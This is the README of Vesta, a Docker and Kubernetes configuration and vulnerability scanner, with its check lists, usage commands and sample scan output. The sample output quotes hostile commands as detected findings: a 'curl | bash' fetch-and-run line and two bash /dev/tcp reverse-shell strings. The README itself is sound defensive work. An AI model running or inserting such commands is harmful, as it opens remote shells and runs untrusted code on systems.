Home

Awesome

<p align="center" style="text-align: center"> <img src="https://user-images.githubusercontent.com/35037256/212051309-56468d85-4132-4780-9722-d1c0dcc79b1b.png" width="55%"> <br/> </p> <p align="center"> A static analysis of vulnerabilities, Docker and Kubernetes cluster configuration detect toolkit based on the real penetration of cloud computing. </p> <div align="center"> <strong> <samp>

English · 简体中文

</samp> </strong> </div>

Overview

Vesta is a static analysis of vulnerabilities, Docker and Kubernetes cluster configuration detect toolkit. It inspects Kubernetes and Docker configures, cluster pods, and containers with safe practices. <br/> <br/> Vesta is a flexible toolkit which can run on physical machines in different types of systems (Windows, Linux, MacOS).

What can vesta check

Scan

Docker

SupportedCheck ItemDescriptionSeverityReference
PrivilegeAllowedPrivileged module is allowed.criticalRef
CapabilitiesDangerous capabilities are opening.criticalRef
Volume MountMount dangerous location.criticalRef
Docker Unauthorized2375 port is opening and unauthorized.criticalRef
Kernel versionKernel version is under the escape version.criticalRef
Network ModuleNet Module is host and containerd version less than 1.41.critical/medium
Pid ModulePid Module is host.high
Docker Server versionServer version is included the vulnerable version.critical/high/ medium/low
Docker env password checkCheck weak password in database.high/medium
Docker HistoryDocker layers and environment have some dangerous commands.high/medium
Docker BackdoorDocker env command has malicious commands.critical/high
Docker SwarmDocker swarm has dangerous config or secrets or containers are unsafe.medium/low
Docker supply chainDocker supply chain has vulnerable configurationscritical/high/ mediumRef

Kubernetes

SupportedCheck ItemDescriptionSeverityReference
PrivilegeAllowedPrivileged module is allowed.criticalRef
CapabilitiesDangerous capabilities are opening.criticalRef
PV and PVCPV is mounted the dangerous location and is active.critical/mediumRef
RBACRBAC has some unsafe configurations in clusterrolebingding or rolebinding.high/medium/ low/warning
Kubernetes-dashboradChecking -enable-skip-login and account permission.critical/high/lowRef
Kernel versionKernel version is under the escape version.criticalRef
Docker Server version (k8s versions is less than v1.24)Server version is included the vulnerable version.critical/high/ medium/low
Kubernetes certification expirationCertification is expired after 30 days.medium
ConfigMap and Secret checkCheck weak password in ConfigMap or Secret.high/medium/lowRef
PodSecurityPolicy check (k8s version under the v1.25)PodSecurityPolicy tolerates dangerous pod configurations.high/medium/lowRef
Auto Mount ServiceAccount TokenMounting default service token.critical/high/ medium/lowRef
NoResourceLimitsNo resource limits are set.lowRef
Job and CronjobNo seccomp or seLinux are set in Job or CronJob.lowRef
Envoy adminEnvoy admin is opening and listen to 0.0.0.0.high/mediumRef
Cilium versionCilium has vulnerable version.critical/high/ medium/lowRef
Istio configurationsIstio has vulnerable version and vulnerable configurations.critical/high/ medium/lowRef
Kubelet 10250/10255 and Kubectl proxy10255/10250 port are opening and unauthorized or Kubectl proxy is opening.high/medium/low
Etcd configurationEtcd safe configuration checking.high/medium
Sidecar configurationsSidecar has some dangerous configurations.critical/high/ medium/low
Pod annotationPod annotation has some unsafe configurations.high/medium/ low/warningRef
DaemonSetDaemonSet has unsafe configurations.critical/high/ medium/low
BackdoorBackdoor Detection.critical/highRef
Lateral admin movementPod specifics a master node.medium/low

Build

Vesta is built with Go 1.18.

make build

Quick Start

Example of image or container scan, use -f to input by a tar file, start vesta:

# Container
vesta scan image cve-2019-14234_web:latest
vesta scan image -f example.tar

# Image
vesta scan container <CONTAINER ID>
vesta scan container -f example.tar

# Filesystem
vesta scan fs <path_of_filesystem>

Ouput:

2022/11/29 22:50:00 Searching for image
2022/11/29 22:50:19 Begin upgrading vulnerability database
2022/11/29 22:50:19 Vulnerability Database is already initialized
2022/11/29 22:50:19 Begin to analyze the layer
2022/11/29 22:50:35 Begin to scan the layer

Detected 216 vulnerabilities

+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 208 | python3.6 - Django | 2.2.3           | CVE-2019-14232   |   7.5 | high     | An issue was discovered                                          |
|     |                    |                 |                  |       |          | in Django 1.11.x before                                          |
|     |                    |                 |                  |       |          | 1.11.23, 2.1.x before 2.1.11,                                    |
|     |                    |                 |                  |       |          | and 2.2.x before 2.2.4. If                                       |
|     |                    |                 |                  |       |          | django.utils.text.Truncator's                                    |
|     |                    |                 |                  |       |          | chars() and words() methods                                      |
|     |                    |                 |                  |       |          | were passed the html=True                                        |
|     |                    |                 |                  |       |          | argument, t ...                                                  |
+-----+                    +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 209 |                    | 2.2.3           | CVE-2019-14233   |   7.5 | high     | An issue was discovered                                          |
|     |                    |                 |                  |       |          | in Django 1.11.x before                                          |
|     |                    |                 |                  |       |          | 1.11.23, 2.1.x before 2.1.11,                                    |
|     |                    |                 |                  |       |          | and 2.2.x before 2.2.4.                                          |
|     |                    |                 |                  |       |          | Due to the behaviour of                                          |
|     |                    |                 |                  |       |          | the underlying HTMLParser,                                       |
|     |                    |                 |                  |       |          | django.utils.html.strip_tags                                     |
|     |                    |                 |                  |       |          | would be extremely ...                                           |
+-----+                    +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 210 |                    | 2.2.3           | CVE-2019-14234   |   9.8 | critical | An issue was discovered in                                       |
|     |                    |                 |                  |       |          | Django 1.11.x before 1.11.23,                                    |
|     |                    |                 |                  |       |          | 2.1.x before 2.1.11, and 2.2.x                                   |
|     |                    |                 |                  |       |          | before 2.2.4. Due to an error                                    |
|     |                    |                 |                  |       |          | in shallow key transformation,                                   |
|     |                    |                 |                  |       |          | key and index lookups for                                        |
|     |                    |                 |                  |       |          | django.contrib.postgres.f ...                                    |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 211 | python3.6 - numpy  | 1.24.2          |                  |   8.5 | high     | Malicious package is detected in                                 |
|     |                    |                 |                  |       |          | '/usr/local/lib/python3.6/site-packages/numpy/setup.py',         |
|     |                    |                 |                  |       |          | malicious command "curl https://vuln.com | bash" are             |
|     |                    |                 |                  |       |          | detected.                                                        |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+

Docker Histories:
+----+---------------+----------------------------+-------+-------+--------+--------------------------------+
| ID |     NAME      | CURRENT/VULNERABLE VERSION | CVEID | SCORE | LEVEL  |          DESCRIPTION           |
+----+---------------+----------------------------+-------+-------+--------+--------------------------------+
|  1 | Image History | - / -                      | -     |   0.0 | high   | Confusion value found          |
|    |               |                            |       |       |        | in ENV: 'command' with         |
|    |               |                            |       |       |        | the plain text 'bash -i        |
|    |               |                            |       |       |        | >&/dev/tcp/127.0.0.1/9999 0>&1 |
|    |               |                            |       |       |        | '.                             |
+----+---------------+----------------------------+-------+-------+--------+--------------------------------+
|  2 |               | - / -                      | -     |   0.0 | medium | Docker history has found the   |
|    |               |                            |       |       |        | senstive environment with      |
|    |               |                            |       |       |        | key 'SECRET_KEY' and value:    |
|    |               |                            |       |       |        | 123456.                        |
+----+---------------+----------------------------+-------+-------+--------+--------------------------------+

<details> <summary>Result</summary>

</details>

Example of docker config scan, start vesta:

vesta analyze docker

Or run with dokcer

make run.docker

Output:

2022/11/29 23:06:32 Start analysing
2022/11/29 23:06:32 Getting engine version
2022/11/29 23:06:32 Getting docker server version
2022/11/29 23:06:32 Getting kernel version

Detected 3 vulnerabilities

+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| ID |      CONTAINER DETAIL      |     PARAM      |             VALUE              | SEVERITY |          DESCRIPTION           |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  1 | Name: Kernel               | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |
|    | ID: None                   |                |                                |          | the CVE-2022-0492 with         |
|    |                            |                |                                |          | CAP_SYS_ADMIN and v1           |
|    |                            |                |                                |          | architecture of cgroups        |
|    |                            |                |                                |          | vulnerablility, has a          |
|    |                            |                |                                |          | potential container escape.    |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  2 | Name: vesta_vuln_test      | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |
|    | ID: 207cf8842b15           |                |                                |          | the Dirty Pipe vulnerablility, |
|    |                            |                |                                |          | has a potential container      |
|    |                            |                |                                |          | escape.                        |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  3 | Name: Image Tag            | Privileged     | true                           | critical | There has a potential container|
|    | ID: None                   |                |                                |          | escape in privileged  module.  |
|    |                            |                |                                |          |                                |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  4 | Name: Image Configuration  | Image History  | Image name:                    | high     | Weak password found            |
|    | ID: None                   |                | vesta_history_test:latest |    |          | in command: ' echo             |
|    |                            |                | Image ID: 4bc05e1e3881         |          | 'password=test123456' >        |
|    |                            |                |                                |          | config.ini # buildkit'.        |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+

Example of Kubernetes config scan, start vesta:

vesta analyze k8s

Output:

2022/11/29 23:15:59 Start analysing
2022/11/29 23:15:59 Getting docker server version
2022/11/29 23:15:59 Getting kernel version

Detected 4 vulnerabilities

Pods:
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| ID |           POD DETAIL           |             PARAM              |             VALUE              |         TYPE          | SEVERITY |          DESCRIPTION           |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|  1 | Name: vulntest | Namespace:    | sidecar name: vulntest |       | true                           | Pod                   | critical | There has a potential          |
|    | default | Status: Running |    | Privileged                     |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest |       | Token:Password123456           | Sidecar EnvFrom       | high     | Sidecar envFrom ConfigMap has  |
|    |                                | env                            |                                |                       |          | found weak password:           |
|    |                                |                                |                                |                       |          | 'Password123456'.              |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: sidecartest |    | MALWARE: bash -i >&            | Sidecar Env           | high     | Container 'sidecartest' finds  |
|    |                                | env                            | /dev/tcp/10.0.0.1/8080 0>&1    |                       |          | high risk content(score:       |
|    |                                |                                |                                |                       |          | 0.91 out of 1.0), which is a   |
|    |                                |                                |                                |                       |          | suspect command backdoor.      |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|  2 | Name: vulntest2 | Namespace:   | sidecar name: vulntest2 |      | CAP_SYS_ADMIN                  | capabilities.add      | critical | There has a potential          |
|    | default | Status: Running |    | capabilities                   |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | true                           | kube-api-access-lcvh8 | critical | Mount service account          |
|    |                                | automountServiceAccountToken   |                                |                       |          | and key permission are         |
|    |                                |                                |                                |                       |          | given, which will cause a      |
|    |                                |                                |                                |                       |          | potential container escape.    |
|    |                                |                                |                                |                       |          | Reference clsuterRolebind:     |
|    |                                |                                |                                |                       |          | vuln-clusterrolebinding |      |
|    |                                |                                |                                |                       |          | roleBinding: vuln-rolebinding  |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | cpu                            | Pod                   | low      | CPU usage is not limited.      |
|    |                                | Resource                       |                                |                       |          |                                |
|    |                                |                                |                                |                       |          |                                |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+

Configures:
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| ID |            TYPEL            |             PARAM              |                         VALUE                          | SEVERITY |          DESCRIPTION           |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  1 | K8s version less than v1.24 | kernel version                 | 5.10.104-linuxkit                                      | critical | Kernel version is suffering    |
|    |                             |                                |                                                        |          | the CVE-2022-0185 with         |
|    |                             |                                |                                                        |          | CAP_SYS_ADMIN vulnerablility,  |
|    |                             |                                |                                                        |          | has a potential container      |
|    |                             |                                |                                                        |          | escape.                        |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  2 | ConfigMap                   | ConfigMap Name: vulnconfig     | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high     | ConfigMap has found weak       |
|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  3 | Secret                      | Secret Name: vulnsecret-auth   | password:Password123                                   | high     | Secret has found weak          |
|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  4 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | high     | Key permissions with key       |
|    |                             | vuln-clusterrolebinding |      | create, update | resources:                            |          | resources given to the         |
|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | default service account, which |
|    |                             | kind: ClusterRole | subject    |                                                        |          | will cause a potential data    |
|    |                             | kind: Group | subject name:    |                                                        |          | leakage.                       |
|    |                             | system:serviceaccounts:vuln |  |                                                        |          |                                |
|    |                             | namespace: vuln                |                                                        |          |                                |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  5 | RoleBinding                 | binding name: vuln-rolebinding | verbs: get, watch, list,                               | high     | Key permissions with key       |
|    |                             | | rolename: vuln-role | role   | create, update | resources:                            |          | resources given to the         |
|    |                             | kind: Role | subject kind:     | pods, services                                         |          | default service account, which |
|    |                             | ServiceAccount | subject name: |                                                        |          | will cause a potential data    |
|    |                             | default | namespace: default   |                                                        |          | leakage.                       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  6 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | warning  | Key permission are given       |
|    |                             | vuln-clusterrolebinding2 |     | create, update | resources:                            |          | to unknown user 'testUser',    |
|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | printing it for checking.      |
|    |                             | subject kind: User | subject   |                                                        |          |                                |
|    |                             | name: testUser | namespace:    |                                                        |          |                                |
|    |                             | all                            |                                                        |          |                                |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
<details> <summary>Result</summary>

</details>

Help information

$./vesta -h
Vesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit
               Tutorial is available at https://github.com/kvesta/vesta

Usage:
  vesta [command]

Available Commands:
  analyze     Kubernetes analyze
  completion  Generate the autocompletion script for the specified shell
  help        Help about any command
  scan        Container scan
  update      Update vulnerability database
  version     Print version information and quit

Flags:
  -h, --help   help for vesta

Event

KCon 2023 Weapon list